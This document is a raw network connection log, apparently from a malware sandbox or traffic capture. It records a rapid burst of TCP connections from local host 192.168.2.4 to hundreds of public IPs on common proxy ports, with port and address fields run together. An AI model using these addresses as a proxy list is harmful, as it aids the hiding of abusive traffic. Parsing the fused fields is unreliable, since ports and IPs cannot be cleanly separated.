                                                                                                      Feb 23, 2024 09:45:16.555463076 CET220354995367.43.227.228192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.556196928 CET805052250.218.57.74192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.557297945 CET9995012145.229.34.174192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.562454939 CET20481505135.196.111.30192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.563602924 CET5051320481192.168.2.45.196.111.30
                                                                                                      Feb 23, 2024 09:45:16.565850973 CET20481503335.196.111.30192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.565865993 CET20481503335.196.111.30192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.566636086 CET1047150266167.172.86.46192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.566905022 CET1047150266167.172.86.46192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.567301035 CET5051320481192.168.2.45.196.111.30
                                                                                                      Feb 23, 2024 09:45:16.567622900 CET312950247103.78.0.44192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.568145990 CET505003128192.168.2.465.21.255.197
                                                                                                      Feb 23, 2024 09:45:16.568635941 CET5015480192.168.2.414.43.238.82
                                                                                                      Feb 23, 2024 09:45:16.568635941 CET4998360186192.168.2.4166.62.53.45
                                                                                                      Feb 23, 2024 09:45:16.568747997 CET501343128192.168.2.43.122.84.99
                                                                                                      Feb 23, 2024 09:45:16.568747997 CET499901080192.168.2.447.251.34.170
                                                                                                      Feb 23, 2024 09:45:16.568788052 CET499878080192.168.2.4103.46.8.15
                                                                                                      Feb 23, 2024 09:45:16.569782019 CET62275022572.10.160.171192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.570209026 CET312850325167.71.5.83192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.570548058 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:16.572875023 CET3228450510185.129.250.183192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.572947025 CET5051032284192.168.2.4185.129.250.183
                                                                                                      Feb 23, 2024 09:45:16.573143959 CET5051032284192.168.2.4185.129.250.183
                                                                                                      Feb 23, 2024 09:45:16.574357986 CET2693950436208.87.131.151192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.575825930 CET4232549919139.99.9.218192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.583003998 CET414550455184.181.217.201192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.583051920 CET414550455184.181.217.201192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.583647966 CET67455028645.43.71.147192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.583878994 CET505374145192.168.2.4184.181.217.201
                                                                                                      Feb 23, 2024 09:45:16.584229946 CET498178899192.168.2.4117.160.250.134
                                                                                                      Feb 23, 2024 09:45:16.584239006 CET499881976192.168.2.441.65.236.37
                                                                                                      Feb 23, 2024 09:45:16.584242105 CET5021080192.168.2.450.231.104.58
                                                                                                      Feb 23, 2024 09:45:16.584252119 CET498962589192.168.2.472.10.160.90
                                                                                                      Feb 23, 2024 09:45:16.584252119 CET499918080192.168.2.445.11.96.41
                                                                                                      Feb 23, 2024 09:45:16.584252119 CET499988080192.168.2.483.126.54.155
                                                                                                      Feb 23, 2024 09:45:16.584258080 CET4999246770192.168.2.465.49.82.7
                                                                                                      Feb 23, 2024 09:45:16.584268093 CET499841080192.168.2.4107.182.142.17
                                                                                                      Feb 23, 2024 09:45:16.584285975 CET5000380192.168.2.468.178.161.107
                                                                                                      Feb 23, 2024 09:45:16.584285975 CET4999753177192.168.2.4104.248.151.220
                                                                                                      Feb 23, 2024 09:45:16.584290028 CET5000131289192.168.2.4129.146.45.163
                                                                                                      Feb 23, 2024 09:45:16.584290028 CET5000280192.168.2.4139.5.64.108
                                                                                                      Feb 23, 2024 09:45:16.584290028 CET500065678192.168.2.4130.193.123.34
                                                                                                      Feb 23, 2024 09:45:16.584297895 CET500043128192.168.2.4154.202.108.37
                                                                                                      Feb 23, 2024 09:45:16.585441113 CET250855023772.10.164.178192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.586489916 CET100114983467.43.227.227192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.587373018 CET60055036487.106.114.124192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.587946892 CET60055051487.106.114.124192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.592524052 CET31284998678.38.93.22192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.592694998 CET505146005192.168.2.487.106.114.124
                                                                                                      Feb 23, 2024 09:45:16.599873066 CET499076095192.168.2.467.43.236.20
                                                                                                      Feb 23, 2024 09:45:16.599901915 CET5031544712192.168.2.492.204.135.4
                                                                                                      Feb 23, 2024 09:45:16.599901915 CET4978180192.168.2.480.228.235.6
                                                                                                      Feb 23, 2024 09:45:16.599935055 CET500134145192.168.2.4168.205.217.171
                                                                                                      Feb 23, 2024 09:45:16.599945068 CET502465678192.168.2.4109.205.243.10
                                                                                                      Feb 23, 2024 09:45:16.599957943 CET50011999192.168.2.4190.109.178.44
                                                                                                      Feb 23, 2024 09:45:16.599987984 CET502368123192.168.2.420.205.61.143
                                                                                                      Feb 23, 2024 09:45:16.599987984 CET500108080192.168.2.4212.174.79.165
                                                                                                      Feb 23, 2024 09:45:16.599987984 CET5001265100192.168.2.4125.229.149.168
                                                                                                      Feb 23, 2024 09:45:16.599992037 CET5025552420192.168.2.4162.214.102.121
                                                                                                      Feb 23, 2024 09:45:16.599992990 CET500055678192.168.2.485.89.184.87
                                                                                                      Feb 23, 2024 09:45:16.599992990 CET500158080192.168.2.4103.148.201.67
                                                                                                      Feb 23, 2024 09:45:16.600920916 CET805053350.170.90.27192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.600959063 CET50016999192.168.2.4201.71.2.115
                                                                                                      Feb 23, 2024 09:45:16.603308916 CET8050331211.222.252.187192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.603323936 CET8050331211.222.252.187192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.603598118 CET5033180192.168.2.4211.222.252.187
                                                                                                      Feb 23, 2024 09:45:16.604630947 CET414550520199.102.107.145192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.610209942 CET2658950440157.185.161.100192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.610380888 CET10805046927.65.116.243192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.615506887 CET500189090192.168.2.4209.250.230.101
                                                                                                      Feb 23, 2024 09:45:16.615506887 CET502844145192.168.2.4142.54.236.97
                                                                                                      Feb 23, 2024 09:45:16.615515947 CET4989145365192.168.2.4142.93.151.99
                                                                                                      Feb 23, 2024 09:45:16.615524054 CET500218789192.168.2.4103.84.235.162
                                                                                                      Feb 23, 2024 09:45:16.615547895 CET4991826077192.168.2.472.10.160.92
                                                                                                      Feb 23, 2024 09:45:16.615547895 CET5002834471192.168.2.4194.233.78.142
                                                                                                      Feb 23, 2024 09:45:16.615547895 CET500141080192.168.2.4180.210.222.153
                                                                                                      Feb 23, 2024 09:45:16.615549088 CET5003150733192.168.2.4186.249.240.146
                                                                                                      Feb 23, 2024 09:45:16.615549088 CET500298000192.168.2.4221.151.181.101
                                                                                                      Feb 23, 2024 09:45:16.615551949 CET500278089192.168.2.4200.63.107.118
                                                                                                      Feb 23, 2024 09:45:16.615607023 CET5001959329192.168.2.4187.188.169.169
                                                                                                      Feb 23, 2024 09:45:16.615607023 CET500173128192.168.2.434.145.53.40
                                                                                                      Feb 23, 2024 09:45:16.618205070 CET108050274202.162.219.12192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.618491888 CET108050274202.162.219.12192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.618561029 CET502741080192.168.2.4202.162.219.12
                                                                                                      Feb 23, 2024 09:45:16.619050980 CET8049845103.152.116.82192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.619098902 CET4984580192.168.2.4103.152.116.82
                                                                                                      Feb 23, 2024 09:45:16.619596004 CET41455016568.71.247.130192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.619697094 CET805011350.204.219.224192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.620501995 CET5177849933192.169.226.96192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.621376038 CET5445049911171.226.88.162192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.623771906 CET8050375117.160.250.134192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.624519110 CET5037580192.168.2.4117.160.250.134
                                                                                                      Feb 23, 2024 09:45:16.624857903 CET414550475116.199.170.17192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.626315117 CET156735051223.95.216.90192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.626383066 CET504754145192.168.2.4116.199.170.17
                                                                                                      Feb 23, 2024 09:45:16.626410007 CET805025650.174.145.13192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.626595020 CET808050112186.192.195.211192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.627482891 CET156735051223.95.216.90192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.627759933 CET108015027672.10.164.178192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.631127119 CET5002510820192.168.2.488.255.217.44
                                                                                                      Feb 23, 2024 09:45:16.631146908 CET4990980192.168.2.450.170.90.25
                                                                                                      Feb 23, 2024 09:45:16.631155014 CET500378080192.168.2.496.80.235.1
                                                                                                      Feb 23, 2024 09:45:16.631155014 CET500238080192.168.2.478.47.103.89
                                                                                                      Feb 23, 2024 09:45:16.631155014 CET502303128192.168.2.4186.156.161.235
                                                                                                      Feb 23, 2024 09:45:16.631160021 CET5004148678192.168.2.4180.131.242.221
                                                                                                      Feb 23, 2024 09:45:16.631166935 CET5030745314192.168.2.4104.238.100.115
                                                                                                      Feb 23, 2024 09:45:16.631166935 CET497514145192.168.2.4222.124.130.198
                                                                                                      Feb 23, 2024 09:45:16.631181002 CET500428080192.168.2.4139.5.73.71
                                                                                                      Feb 23, 2024 09:45:16.631184101 CET5003353281192.168.2.4193.41.88.58
                                                                                                      Feb 23, 2024 09:45:16.631191969 CET5003855443192.168.2.477.233.5.68
                                                                                                      Feb 23, 2024 09:45:16.631247997 CET4978680192.168.2.4154.113.121.60
                                                                                                      Feb 23, 2024 09:45:16.631588936 CET1648950279162.210.192.135192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.631619930 CET5004580192.168.2.4202.61.204.51
                                                                                                      Feb 23, 2024 09:45:16.631637096 CET500478088192.168.2.447.243.177.210
                                                                                                      Feb 23, 2024 09:45:16.632736921 CET805052813.81.217.201192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.634987116 CET80805051965.21.188.18192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.635085106 CET5052880192.168.2.413.81.217.201
                                                                                                      Feb 23, 2024 09:45:16.635754108 CET505198080192.168.2.465.21.188.18
                                                                                                      Feb 23, 2024 09:45:16.636260033 CET41454985124.249.199.4192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.636296988 CET41454985124.249.199.4192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.637453079 CET804985650.174.145.10192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.642402887 CET90025033639.165.0.137192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.644372940 CET503369002192.168.2.439.165.0.137
                                                                                                      Feb 23, 2024 09:45:16.646749973 CET500361975192.168.2.441.33.203.233
                                                                                                      Feb 23, 2024 09:45:16.646753073 CET500351976192.168.2.441.65.55.2
                                                                                                      Feb 23, 2024 09:45:16.646754980 CET503014145192.168.2.4104.200.135.46
                                                                                                      Feb 23, 2024 09:45:16.646773100 CET5003480192.168.2.4211.128.96.206
                                                                                                      Feb 23, 2024 09:45:16.646773100 CET502883128192.168.2.485.214.244.174
                                                                                                      Feb 23, 2024 09:45:16.646773100 CET500515678192.168.2.441.70.12.54
                                                                                                      Feb 23, 2024 09:45:16.646789074 CET503054145192.168.2.4199.102.106.94
                                                                                                      Feb 23, 2024 09:45:16.646789074 CET5013380192.168.2.4223.27.144.51
                                                                                                      Feb 23, 2024 09:45:16.646836996 CET500443128192.168.2.439.109.113.97
                                                                                                      Feb 23, 2024 09:45:16.647572041 CET5006064817192.168.2.494.23.83.53
                                                                                                      Feb 23, 2024 09:45:16.647572994 CET5004936273192.168.2.4171.244.140.160
                                                                                                      Feb 23, 2024 09:45:16.647593975 CET5005361080192.168.2.4176.88.177.197
                                                                                                      Feb 23, 2024 09:45:16.647694111 CET500488080192.168.2.477.235.19.2
                                                                                                      Feb 23, 2024 09:45:16.648121119 CET63314987872.10.164.178192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.648159027 CET29294987772.10.164.178192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.649039030 CET10805048827.75.152.191192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.649164915 CET504881080192.168.2.427.75.152.191
                                                                                                      Feb 23, 2024 09:45:16.650624037 CET4931449941208.87.131.151192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.650810957 CET4994149314192.168.2.4208.87.131.151
                                                                                                      Feb 23, 2024 09:45:16.652400970 CET56784984489.161.90.203192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.653198957 CET56784984489.161.90.203192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.654625893 CET8049771117.160.250.132192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.655576944 CET365465028970.32.26.23192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.659547091 CET2658950535157.185.161.100192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.660849094 CET567850076109.127.82.114192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.661005974 CET5053526589192.168.2.4157.185.161.100
                                                                                                      Feb 23, 2024 09:45:16.662349939 CET500548080192.168.2.4196.219.202.74
                                                                                                      Feb 23, 2024 09:45:16.662383080 CET5006580192.168.2.4146.59.14.159
                                                                                                      Feb 23, 2024 09:45:16.662383080 CET501838000192.168.2.4128.199.252.22
                                                                                                      Feb 23, 2024 09:45:16.662395000 CET5007235010192.168.2.4185.215.160.118
                                                                                                      Feb 23, 2024 09:45:16.662395000 CET499445769192.168.2.467.43.227.228
                                                                                                      Feb 23, 2024 09:45:16.662395000 CET4994680192.168.2.450.174.214.218
                                                                                                      Feb 23, 2024 09:45:16.662395000 CET498644145192.168.2.472.37.216.68
                                                                                                      Feb 23, 2024 09:45:16.662395000 CET503452011192.168.2.467.43.228.253
                                                                                                      Feb 23, 2024 09:45:16.662410975 CET500661234192.168.2.493.230.164.47
                                                                                                      Feb 23, 2024 09:45:16.662410975 CET500738080192.168.2.4102.176.103.134
                                                                                                      Feb 23, 2024 09:45:16.662419081 CET501994153192.168.2.4103.117.109.9
                                                                                                      Feb 23, 2024 09:45:16.662460089 CET5007028119192.168.2.4152.228.140.225
                                                                                                      Feb 23, 2024 09:45:16.662461042 CET500673128192.168.2.4154.202.96.103
                                                                                                      Feb 23, 2024 09:45:16.662543058 CET5006250539192.168.2.492.205.185.251
                                                                                                      Feb 23, 2024 09:45:16.662826061 CET498533128192.168.2.446.101.102.134
                                                                                                      Feb 23, 2024 09:45:16.666672945 CET1807249910109.123.254.43192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.666774035 CET4991018072192.168.2.4109.123.254.43
                                                                                                      Feb 23, 2024 09:45:16.668466091 CET805049764.227.106.157192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.668529987 CET805049764.227.106.157192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.668620110 CET805049764.227.106.157192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.672179937 CET5049780192.168.2.464.227.106.157
                                                                                                      Feb 23, 2024 09:45:16.673130989 CET808150471185.49.31.207192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.673481941 CET808150471185.49.31.207192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.673536062 CET808150471185.49.31.207192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.675506115 CET504718081192.168.2.4185.49.31.207
                                                                                                      Feb 23, 2024 09:45:16.676042080 CET808249996150.107.136.110192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.676476955 CET804981450.172.23.10192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.678020954 CET5043549397192.168.2.4172.93.111.87
                                                                                                      Feb 23, 2024 09:45:16.678056955 CET5029610801192.168.2.495.111.91.50
                                                                                                      Feb 23, 2024 09:45:16.678060055 CET500808080192.168.2.4200.108.197.2
                                                                                                      Feb 23, 2024 09:45:16.678060055 CET500785005192.168.2.4173.249.37.45
                                                                                                      Feb 23, 2024 09:45:16.678091049 CET5008580192.168.2.4172.67.181.89
                                                                                                      Feb 23, 2024 09:45:16.678219080 CET500843128192.168.2.4154.202.98.133
                                                                                                      Feb 23, 2024 09:45:16.679691076 CET25894989672.10.160.90192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.679794073 CET502573128192.168.2.4195.158.16.9
                                                                                                      Feb 23, 2024 09:45:16.681472063 CET312850043185.105.230.45192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.682121992 CET500638080192.168.2.4203.112.79.90
                                                                                                      Feb 23, 2024 09:45:16.682132006 CET500799990192.168.2.4103.234.26.163
                                                                                                      Feb 23, 2024 09:45:16.682136059 CET500821976192.168.2.4154.236.179.226
                                                                                                      Feb 23, 2024 09:45:16.682272911 CET5008680192.168.2.4172.64.80.55
                                                                                                      Feb 23, 2024 09:45:16.683288097 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.683636904 CET80805034991.202.230.219192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.684158087 CET805025150.168.163.179192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.684293032 CET31284981513.234.24.116192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.684365988 CET31284981513.234.24.116192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.684452057 CET31284981513.234.24.116192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.684596062 CET498153128192.168.2.413.234.24.116
                                                                                                      Feb 23, 2024 09:45:16.689934015 CET108249736181.209.113.234192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.693254948 CET858749821178.62.103.49192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.693641901 CET503623128192.168.2.4144.21.53.111
                                                                                                      Feb 23, 2024 09:45:16.693641901 CET5007425508192.168.2.4107.180.89.55
                                                                                                      Feb 23, 2024 09:45:16.693644047 CET501944153192.168.2.4184.82.142.201
                                                                                                      Feb 23, 2024 09:45:16.693645954 CET50089999192.168.2.445.225.207.183
                                                                                                      Feb 23, 2024 09:45:16.693650007 CET447125031592.204.135.4192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.693656921 CET500875089192.168.2.467.43.236.18
                                                                                                      Feb 23, 2024 09:45:16.693669081 CET5009313722192.168.2.479.137.204.235
                                                                                                      Feb 23, 2024 09:45:16.693669081 CET5008349426192.168.2.4188.164.196.30
                                                                                                      Feb 23, 2024 09:45:16.693669081 CET500944153192.168.2.445.181.88.146
                                                                                                      Feb 23, 2024 09:45:16.693671942 CET500883128192.168.2.4154.202.108.169
                                                                                                      Feb 23, 2024 09:45:16.693674088 CET5009680192.168.2.446.101.19.131
                                                                                                      Feb 23, 2024 09:45:16.693677902 CET5009236946192.168.2.4207.180.234.220
                                                                                                      Feb 23, 2024 09:45:16.693692923 CET5009780192.168.2.4203.243.63.16
                                                                                                      Feb 23, 2024 09:45:16.693694115 CET501005678192.168.2.4190.232.89.125
                                                                                                      Feb 23, 2024 09:45:16.694763899 CET60954990767.43.236.20192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.700192928 CET99950250190.61.48.24192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.700743914 CET312850190178.236.246.53192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.709247112 CET5009141878192.168.2.4213.226.11.149
                                                                                                      Feb 23, 2024 09:45:16.709261894 CET5009938242192.168.2.4162.144.36.208
                                                                                                      Feb 23, 2024 09:45:16.709412098 CET501023547192.168.2.445.117.179.179
                                                                                                      Feb 23, 2024 09:45:16.709413052 CET5010760103192.168.2.495.165.163.188
                                                                                                      Feb 23, 2024 09:45:16.709414005 CET501033128192.168.2.4154.202.112.186
                                                                                                      Feb 23, 2024 09:45:16.709414959 CET4977517182192.168.2.4139.99.9.218
                                                                                                      Feb 23, 2024 09:45:16.709418058 CET501053128192.168.2.4178.33.252.189
                                                                                                      Feb 23, 2024 09:45:16.709418058 CET5011111945192.168.2.492.246.139.112
                                                                                                      Feb 23, 2024 09:45:16.710697889 CET260774991872.10.160.92192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.710927010 CET190504986051.83.190.248192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.711285114 CET8050098190.58.248.86192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.724874973 CET501048080192.168.2.4138.0.228.185
                                                                                                      Feb 23, 2024 09:45:16.724878073 CET503972955192.168.2.472.10.160.172
                                                                                                      Feb 23, 2024 09:45:16.724878073 CET501603128192.168.2.4185.165.46.208
                                                                                                      Feb 23, 2024 09:45:16.724881887 CET4989431979192.168.2.451.77.73.67
                                                                                                      Feb 23, 2024 09:45:16.724884033 CET5010664731192.168.2.4162.0.220.222
                                                                                                      Feb 23, 2024 09:45:16.724884033 CET498703128192.168.2.491.149.224.168
                                                                                                      Feb 23, 2024 09:45:16.724900007 CET5012051350192.168.2.4166.62.53.45
                                                                                                      Feb 23, 2024 09:45:16.724903107 CET5035980192.168.2.450.172.39.98
                                                                                                      Feb 23, 2024 09:45:16.724910975 CET5011880192.168.2.4123.110.158.236
                                                                                                      Feb 23, 2024 09:45:16.724942923 CET5011739180192.168.2.4173.212.240.168
                                                                                                      Feb 23, 2024 09:45:16.724980116 CET326504991641.217.223.145192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.726437092 CET20481505135.196.111.30192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.730540991 CET4536549891142.93.151.99192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.731780052 CET8050358203.222.24.36192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.733129025 CET8050358203.222.24.36192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.733161926 CET8050358203.222.24.36192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.733243942 CET5035880192.168.2.4203.222.24.36
                                                                                                      Feb 23, 2024 09:45:16.739905119 CET67885040945.43.84.163192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.739939928 CET67885040945.43.84.163192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.740009069 CET504096788192.168.2.445.43.84.163
                                                                                                      Feb 23, 2024 09:45:16.740479946 CET501308090192.168.2.4122.3.41.154
                                                                                                      Feb 23, 2024 09:45:16.740499020 CET5013280192.168.2.4115.244.127.161
                                                                                                      Feb 23, 2024 09:45:16.740503073 CET5014063128192.168.2.4203.110.145.82
                                                                                                      Feb 23, 2024 09:45:16.740518093 CET5033080192.168.2.450.200.12.86
                                                                                                      Feb 23, 2024 09:45:16.740521908 CET501288081192.168.2.483.238.80.17
                                                                                                      Feb 23, 2024 09:45:16.740523100 CET5012951935192.168.2.4159.223.71.71
                                                                                                      Feb 23, 2024 09:45:16.740523100 CET501355678192.168.2.4103.134.38.89
                                                                                                      Feb 23, 2024 09:45:16.740525007 CET501364145192.168.2.472.210.208.101
                                                                                                      Feb 23, 2024 09:45:16.740561962 CET5011964305192.168.2.494.23.83.53
                                                                                                      Feb 23, 2024 09:45:16.740561962 CET5036380192.168.2.435.185.254.159
                                                                                                      Feb 23, 2024 09:45:16.740570068 CET8049981221.194.149.8192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.740639925 CET8049981221.194.149.8192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.740695953 CET4998180192.168.2.4221.194.149.8
                                                                                                      Feb 23, 2024 09:45:16.741520882 CET804990950.170.90.25192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.741959095 CET414550537184.181.217.201192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.743793011 CET505374145192.168.2.4184.181.217.201
                                                                                                      Feb 23, 2024 09:45:16.744560003 CET31285018294.142.142.140192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.745759964 CET1095850291132.148.154.97192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.745800972 CET1095850291132.148.154.97192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.745858908 CET5029110958192.168.2.4132.148.154.97
                                                                                                      Feb 23, 2024 09:45:16.747339010 CET6469350123208.87.131.151192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.747374058 CET6469350123208.87.131.151192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.748166084 CET5012364693192.168.2.4208.87.131.151
                                                                                                      Feb 23, 2024 09:45:16.755100012 CET3000149826111.3.102.135192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.755614042 CET4982630001192.168.2.4111.3.102.135
                                                                                                      Feb 23, 2024 09:45:16.756104946 CET5008180192.168.2.4103.44.239.244
                                                                                                      Feb 23, 2024 09:45:16.756104946 CET501388080192.168.2.445.250.215.8
                                                                                                      Feb 23, 2024 09:45:16.756124973 CET501448088192.168.2.4103.143.9.85
                                                                                                      Feb 23, 2024 09:45:16.756129026 CET5041980192.168.2.450.218.57.69
                                                                                                      Feb 23, 2024 09:45:16.756189108 CET501488080192.168.2.4103.221.55.101
                                                                                                      Feb 23, 2024 09:45:16.756225109 CET5014540350192.168.2.4148.72.41.47
                                                                                                      Feb 23, 2024 09:45:16.756638050 CET31285050065.21.255.197192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.756717920 CET501495678192.168.2.4212.39.114.139
                                                                                                      Feb 23, 2024 09:45:16.756938934 CET31285050065.21.255.197192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.760332108 CET3979650347141.94.174.6192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.760365963 CET3979650347141.94.174.6192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.760421991 CET5034739796192.168.2.4141.94.174.6
                                                                                                      Feb 23, 2024 09:45:16.761122942 CET57694994467.43.227.228192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.763051033 CET805035513.229.47.109192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.763205051 CET805035513.229.47.109192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.763237000 CET805035513.229.47.109192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.764031887 CET5035580192.168.2.413.229.47.109
                                                                                                      Feb 23, 2024 09:45:16.765507936 CET804994650.174.214.218192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.766499043 CET8050085172.67.181.89192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.767780066 CET20115034567.43.228.253192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.767935991 CET5008580192.168.2.4172.67.181.89
                                                                                                      Feb 23, 2024 09:45:16.768456936 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.768651962 CET4978380192.168.2.496.114.36.9
                                                                                                      Feb 23, 2024 09:45:16.770538092 CET8050086172.64.80.55192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.771502972 CET5008680192.168.2.4172.64.80.55
                                                                                                      Feb 23, 2024 09:45:16.771709919 CET5031880192.168.2.482.208.111.19
                                                                                                      Feb 23, 2024 09:45:16.771723986 CET502688080192.168.2.4185.38.111.1
                                                                                                      Feb 23, 2024 09:45:16.771734953 CET50150666192.168.2.4201.20.80.113
                                                                                                      Feb 23, 2024 09:45:16.771739006 CET4978932650192.168.2.4154.79.254.236
                                                                                                      Feb 23, 2024 09:45:16.771740913 CET50146999192.168.2.4167.249.29.22
                                                                                                      Feb 23, 2024 09:45:16.771739006 CET50388999192.168.2.4191.97.16.160
                                                                                                      Feb 23, 2024 09:45:16.771750927 CET499821611192.168.2.472.10.160.170
                                                                                                      Feb 23, 2024 09:45:16.771759987 CET497683256192.168.2.4125.87.82.86
                                                                                                      Feb 23, 2024 09:45:16.771789074 CET5043130783192.168.2.467.43.228.253
                                                                                                      Feb 23, 2024 09:45:16.771791935 CET501478080192.168.2.4103.4.94.2
                                                                                                      Feb 23, 2024 09:45:16.771794081 CET5015680192.168.2.4193.231.40.182
                                                                                                      Feb 23, 2024 09:45:16.771820068 CET5015280192.168.2.4152.230.215.123
                                                                                                      Feb 23, 2024 09:45:16.771840096 CET501598888192.168.2.4217.219.74.130
                                                                                                      Feb 23, 2024 09:45:16.771852970 CET501513128192.168.2.4154.202.127.106
                                                                                                      Feb 23, 2024 09:45:16.771908998 CET501588080192.168.2.4181.129.43.3
                                                                                                      Feb 23, 2024 09:45:16.771990061 CET805053462.99.138.162192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.772031069 CET501623128192.168.2.4103.132.52.210
                                                                                                      Feb 23, 2024 09:45:16.774322987 CET5242050255162.214.102.121192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.776767015 CET805014343.231.22.229192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.776802063 CET4531450307104.238.100.115192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.787368059 CET5013162842192.168.2.4146.190.84.209
                                                                                                      Feb 23, 2024 09:45:16.787369013 CET5015516379192.168.2.451.15.241.5
                                                                                                      Feb 23, 2024 09:45:16.787368059 CET5015749382192.168.2.4173.249.33.122
